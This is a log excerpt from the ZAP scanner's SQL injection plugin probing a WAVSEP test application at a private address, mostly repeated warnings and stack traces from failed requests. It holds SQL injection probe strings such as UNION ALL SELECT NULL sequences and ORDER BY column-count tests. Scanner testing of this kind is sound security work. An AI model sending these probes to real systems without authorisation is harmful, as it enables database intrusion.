org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682269 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682270 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682271 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682271 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682273 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682273 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682274 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7910-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 7910-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682275 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682276 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682277 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682277 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682278 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 